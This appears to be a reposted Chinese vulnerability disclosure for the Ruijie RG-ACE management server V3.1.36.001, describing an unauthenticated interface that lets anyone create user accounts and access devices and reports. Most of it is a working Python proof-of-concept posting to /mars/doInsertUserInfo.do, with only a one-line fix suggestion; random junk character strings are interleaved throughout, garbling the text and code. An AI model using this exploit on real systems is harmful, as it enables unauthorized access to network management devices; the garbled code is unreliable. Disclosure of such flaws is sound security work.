锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
2 }# o7 ^( ~$ |! y% w  w
2 A) @, B4 H8 W/ U5 f- n+ M/ v8 K
8 K9 r: F5 A0 ?/ h测试的具体版本是
产品名称: 锐捷应用控制引擎
8 Y' x& G+ h6 t4 @版本号: 3.1.36.001 TC
编译时间: 201104291730
/ i8 P' Z- v! E) M
! k; J/ a2 f' [) Q, _
漏洞证明：
+ w2 V; v# n& ?' O+ C# H
% X9 `% y2 O" q) I
' N" }2 K3 g+ F3 h% Q: ^* f
! f5 W+ |5 s% \% I3 I
+ y. a2 ]$ [/ a( y9 A! a& h
; u$ |& m- U7 f% x
0 f% \2 p' W5 t- V执行脚本
/ D1 z9 e& J, ?2 ^. t" O/ R6 |#! /usr/bin/env python
4 a7 g1 y; b: d' k7 q# z#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
5 S: q& B( T4 S% [. }" q$ S" g  himport urllib2, urllib,cookielib
/ Z" Q' C# {: s5 R/ yurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
; Z/ x! K; [' T$ f! copener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
0 t) J) _+ W: l! a6 qpost=(("event","userManager.doInsertUserInfo"),
! Q; K0 n$ A3 p+ M0 g% R/ `("useractionname","addButtonValue"),
("useropermanager","userManager"),
# X. T- B0 W7 ?# V' e# o0 Q: ]3 y3 g("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
5 p  _+ i1 V; i/ n3 M  ?4 ?("email",""),
("mobilePhone",""),
("officePhone",""),
' M$ j" j+ m+ o% Z6 |: y! z5 g+ x("addr",""),
: s& V1 U: a: X: z("submit","确定"))
4 ?: a: k. ]4 w( ]1 Durllib2.install_opener(opener)
- e; @! ?7 r0 Z! e" sp=urllib2.urlopen(url, urllib.urlencode(post)).read()
# f' K; }& f: Y. d5 Aprint "Done"

  j2 Z# }2 m5 c: V/ K. t- V登录，连接设备

1 z4 R2 e8 q7 I9 }9 W3 G: l' x

4 j0 T* w0 M3 ^: ~
, d# O: C2 @/ S; _$ v% Y  a
7 P8 ?* _: {: _% P. |3 q# c默认的管理员admin权限更大点
) I0 Q6 Q8 x, A. W" ]4 V% `* n6 d
5 o0 D" K' l- Z6 r- e4 n
$ ^' ^" l- g# R% Z6 `
" X" s& V  t) f2 s

修复方案：
  a. h! f/ T$ [* R' H加强对接口的权限验证
2 `1 P, @" ^1 r3 h& |, Y